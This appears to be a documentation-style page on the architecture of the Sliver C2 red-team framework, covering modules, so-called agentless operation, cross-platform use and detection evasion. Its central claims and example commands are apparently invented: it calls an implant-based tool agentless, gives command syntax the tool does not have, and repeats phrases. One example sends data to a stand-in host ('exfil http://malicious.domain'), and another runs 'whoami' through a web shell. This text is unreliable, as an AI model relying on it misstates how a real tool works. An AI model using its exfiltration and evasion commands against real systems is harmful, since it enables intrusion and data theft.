Skip to content

Sliver C2 Architecture

Sliver-C2 is a modular, agentless command-and-control (C2) framework designed for stealthy, cross-platform operational security (OPSEC) during red team engagements. Its architecture emphasizes flexibility, scalability, and integration with existing infrastructure, enabling operators to leverage common protocols and services while minimizing detection. The framework’s design allows for rapid adaptation to evolving defensive countermeasures and supports both persistent and transient C2 operations.


Modular Architecture

Sliver-C2’s architecture is built around a core C2 server and a plugin-based module system, enabling operators to customize functionality without modifying core components. Key architectural elements include:

  • C2 Server: Acts as the central hub for communication, handling authentication, command distribution, and result aggregation. It supports multiple transport protocols (e.g., HTTP, DNS, TLS) and can be deployed as a standalone service or integrated into existing infrastructure.
  • Modules: Encapsulate specific capabilities such as beaconing, file transfer, or privilege escalation. Modules are decoupled from the core, allowing for hot-swapping or dynamic loading. For example, the beacon module enables persistent C2, while the http module provides a lightweight, agentless interface.
  • Extensibility: New modules can be developed in Go (the framework’s native language) or via plugins, enabling integration with custom tools or third-party services.

Example:

# Load a custom module for DNS exfiltration
sliver -m dns_exfil -c "exfil http://malicious.domain"


Agentless C2 Capabilities

Sliver-C2’s agentless design eliminates the need for a persistent payload on the target system, reducing the attack surface and evading detection by endpoint security tools. Instead of relying on traditional implants, it leverages existing network protocols and services to establish and maintain communication. Key features include:

  • Protocol Agnosticism: Uses common protocols like HTTP, DNS, or even network services (e.g., SSH) to exfiltrate data or receive commands. For example, a DNS tunnel can bypass firewalls that block non-standard ports.
  • Transient Operations: Commands are executed via one-time interactions, such as using a web shell to execute a single command and exit, leaving no trace on the target.
  • Stealth: By mimicking legitimate traffic (e.g., HTTPS requests), Sliver-C2 avoids triggering alerts from network monitoring tools.

Example:

# Execute a single command via HTTP without persisting
sliver -c "http -u http://target.com/endpoint -d 'cmd=whoami'"


Cross-Platform Support

Sliver-C2 abstracts platform-specific details, allowing operators to interact with targets across Windows, Linux, and macOS without rewriting C2 logic for each OS. This is achieved through:

  • Unified API: A shared interface for interacting with the C2 server, regardless of the target’s operating system. For example, the same command can be executed on a Windows machine using PowerShell or a Linux system via Bash.
  • Protocol Compatibility: All communication is routed through protocol-agnostic channels, ensuring compatibility across environments. For instance, a DNS-based C2 channel works identically on all platforms.
  • Minimal Footprint: The framework avoids platform-specific dependencies, enabling deployment in air-gapped or restricted environments.

Example:

# Cross-platform command execution
sliver -c "exec -t windows -cmd 'dir C:\Users'"
sliver -c "exec -t linux -cmd 'ls /home'"


Key takeaways

  • Modular design allows for flexible customization and rapid adaptation to new threats.
  • Agentless operations reduce detection risk by avoiding persistent payloads.
  • Cross-platform compatibility ensures seamless operation across diverse target environments.
  • Protocol abstraction enables stealthy, stealthy C2 via common network services.
  • Extensibility supports integration with custom tools or third-party services.